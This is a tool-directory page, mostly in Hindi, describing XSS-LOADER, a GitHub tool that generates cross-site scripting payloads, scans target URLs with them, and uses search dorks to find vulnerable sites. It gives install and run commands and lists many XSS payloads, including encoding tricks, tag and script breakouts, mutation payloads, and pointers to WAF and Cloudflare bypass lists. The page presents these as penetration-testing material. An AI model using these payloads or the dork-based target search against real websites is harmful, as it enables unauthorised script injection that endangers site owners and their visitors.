Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
XSS-LOADER — Xss पेलोड जनरेटर ~ Xss स्कैनर ~ Xss डॉर्क फाइंडर | Kitploit
उपकरण/GitHubGitHub/capture0x/xss-loader
वेब भेद्यता स्कैनरपेलोड जनरेशनवेब एप्लिकेशन शोषणWAF बाईपासपेनिट्रेशन टेस्टिंग
GitHubcapture0x/xss-loader

XSS-LOADER

Xss पेलोड जनरेटर ~ Xss स्कैनर ~ Xss डॉर्क फाइंडर

रिपॉजिटरी देखें
6211233 महीने पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

💎   XSS-LOADER TOOLS   💎

TMRSWRR द्वारा लिखित

Version 1.0.0

सभी एक में उपकरण: XSS PAYLOAD GENERATOR -XSS SCANNER-XSS DORK FINDER

इंस्टाग्राम: TMRSWRR

📷 स्क्रीनशॉट 📷

👇 💌 उपयोग कैसे करें 💌 👇

उपयोग कैसे करें

📒 पढ़ें 📒

  • यह उपकरण XSS इंजेक्शन में उपयोग के लिए पेलोड बनाता है
  • पैरामीटर से डिफ़ॉल्ट पेलोड टैग चुनें या अपना पेलोड लिखें
  • यह Xss Scanner पैरामीटर के साथ XSS इंजेक्शन करता है
  • यह Xss Dork Finder पैरामीटर के साथ असुरक्षित साइटों का URL ढूँढता है

💿 स्थापना 💿

requirements.txt के साथ स्थापना

root@kitploit:~
git clone https://github.com/capture0x/XSS-LOADER/
cd XSS-LOADER
pip3 install -r requirements.txt

उपयोग

root@kitploit:~
python3 payloader.py

🗃️ विशेषताएँ 🗃️

*बेसिक पेलोड

Sets default parameter to :<script>alert(1)</script>

*डिव पेलोड

Sets default parameter to :<div onpointerover='alert(1)'>MOVE HERE</div

*इमेज पेलोड

Sets default parameter to :``````

*बॉडी पेलोड

Sets default parameter to :<body ontouchstart=alert(1)>

*एसवीजी पेलोड

Sets default parameter to :<svg onload=alert('1')>

*अपना पेलोड दर्ज करें

Encodes payload writed by user

*पेलोड जनरेटर पैरामीटर

Encodes payload on selected tag

root@kitploit:~
* |   1.  UPPER CASE---->  <SCRIPT>ALERT(1)</SCRIPT>              
* |   2.  UPPER AND LOWER CASE----> <ScRiPt>aleRt(1)</ScRiPt>   
* |   3.  URL ENCODE ----->   %3Cscript%3Ealert%281%29%3C%2Fscript%3E           
* |   4.  HTML ENTITY ENCODE----->  &lt;script&gt;alert(1)&lt;/script&gt; 
* |   5.  SPLIT PAYLOAD ----->  <scri</script>pt>>alert(1)</scri</script>pt>>       
* |   6.  HEX ENCODE ----->  3c7363726970743e616c6572742831293c2f7363726970743e       
* |   7.  UTF-16 ENCODE -----> Encode payload to utf-16 format.   
* |   8.  UTF-32 ENCODE----->  Encode payload to utf-32 format.          
* |   9.  DELETE TAG -----> ";alert('XSS');//            
* |  10.  UNICODE ENCODE----->    %uff1cscript%uff1ealert(1)%uff1c/script%uff1e         
* |  11.  US-ASCII ENCODE ----->  ¼script¾alert(1)¼/script¾      
* |  12.  BASE64 ENCODE ----->   PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==          
* |  13.  UTF-7 ENCODE ----->   +ADw-script+AD4-alert(1)+ADw-/script+AD4-           
* |  14.  PARENTHESIS BYPASS ----->  <script>alert`1`</script>   
* |  15.  UTF-8 ENCODE ----->  %C0%BCscript%C0%BEalert%CA%B91)%C0%BC/script%C0%BE          
* |  16.  TAG BLOCK BREAKOUT-----> "><script>alert(1)</script>
* |  17.  SCRIPT BREAKOUT----->  </script><script>alert(1)</script>
* |  18.  FILE UPLOAD PAYLOAD-----> "><script>alert(1)</script>.gif
* |  19.  INSIDE COMMENTS BYPASS-----> <!--><script>alert(1)</script>-->
* |  20.  MUTATION PAYLOAD-----> <noscript><p title="</noscript><script>alert(1)</script>">
* |  21.  MALFORMED IMG-----> <script>alert(1)</script>">
* |  22.  SPACE BYPASS-----> 
* |  23.  DOWNLEVEL-HIDDEN BLOCK-----> <!--[if gte IE 4]><script>alert(1)</script><![endif]-->
* |  24.  WAF BYPASS PAYLOADS-----> Show Waf Bypass Payload List
* |  25.  CLOUDFLARE BYPASS PAYLOADS-----> Show Cloudflare Bypass Payload List
* |  26.  POLYGLOT PAYLOADS-----> Show Polyglot Bypass Payload List
* |  27.  ALERT PAYLOADS-----> Show Alert Payload List
* |  28.  ALL CREATE PAYLOAD-----> Show Create All Payloads
* |  29.  GO BACK MAIN MENU
* |  30.  EXIT

*Xss Scanner

शुरू में आपको लक्ष्य का URL दर्ज करना होगा। कृपया URL इस उदाहरण के अनुसार दर्ज करें==>जैसे लक्ष्य -----> http://target.com/index.php?name= स्कैनिंग के लिए चुनी गई पेलोड सूची

  • BASIC PAYLOAD LIST ==> Payload list consisting of script tag
  • DIV PAYLOAD LIST ==> Payload list consisting of div tag
  • IMG PAYLOAD LIST ==> Payload list consisting of img tag
  • BODY PAYLOAD LIST ==> Payload list consisting of body tag
  • SVG PAYLOAD LIST ==> Payload list consisting of svg tag
  • MIXED PAYLOAD LIST ==> Payload list consisting of all tag
  • ENTER FILE PATH ==> Payload list determined by the user ,Please enter the url like this example..! (e.g. path -----> /usr/share/wordlists/wfuzz/Injections/XSS.txt)

स्कैनिंग के बाद परिणाम "vulnpayload.txt" में जोड़े जाएंगे।

*Xss Dork Finder

पहले खोज के लिए डॉर्क दर्ज करें: उदाहरण---->inurl:"search.php?q=" स्कैनिंग के बाद परिणाम "dork.txt" में सहेजे जाएंगे।

ज्ञात समस्याएँ

ठीक की गईं:

  • यूनिकोड त्रुटियाँ
  • मॉड्यूल त्रुटियाँ

महत्वपूर्ण:

यदि आप Windows पर स्थापित python3 के लिए उपकरण का उपयोग करना चाहते हैं तो नीचे दिए गए लिंक से डाउनलोड करें:

https://github.com/capture0x/XSS-LOADER-for-WINDOWS

बग और संवर्द्धन

बग रिपोर्ट या संवर्द्धन के लिए कृपया यहाँ एक issue खोलें।

कॉपीराइट 2020

टूल डाउनलोड करें